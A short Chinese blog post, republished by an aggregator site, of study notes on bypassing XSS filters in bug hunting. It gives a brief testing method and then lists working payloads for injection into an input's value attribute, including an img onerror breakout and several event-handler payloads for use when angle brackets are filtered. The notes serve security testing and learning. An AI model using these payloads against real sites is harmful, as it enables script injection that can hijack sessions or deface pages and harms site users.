xss bypass 学习记录
Posted spark-xl
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了xss bypass 学习记录相关的知识,希望对你有一定的参考价值。
0x01杂言
晚上看了一下bypass 的一些套路,罗列了一下各种情况的payload好让挖洞可以直接用,看着看着就被朋友拉去挖洞了。。。当然也是针对xss
这里先总结下几种测试情况,以及挖洞过程测试xss的步骤方法。。。当然我之前挖到的xss都是没有waf的情况属于随缘挖洞,一些高级的bypass技巧在挖洞过程中的应用还是希望和大家探讨
0x02 我的xss测试步骤
首先输入常规的标签 看看输出位置 ,看看对常规的标签的过滤,再试试<a这种是否过滤尖括号
再看看其他的。。。
0x03结合具体输出场景
<input value="" type=text>比如这种在value中的输出
<input value="XSStest" type=text>
"><img src=x onerror=prompt(0);>
过滤尖括号
" autofocus onfocus=alert(1)//
"onmouseover=" prompt(0)x="
"onfocusin=alert(1) autofocusx="
" onfocusout=alert(1) autofocus x="
"onblur=alert(1) autofocusa="睡觉睡觉
以上是关于xss bypass 学习记录的主要内容,如果未能解决你的问题,请参考以下文章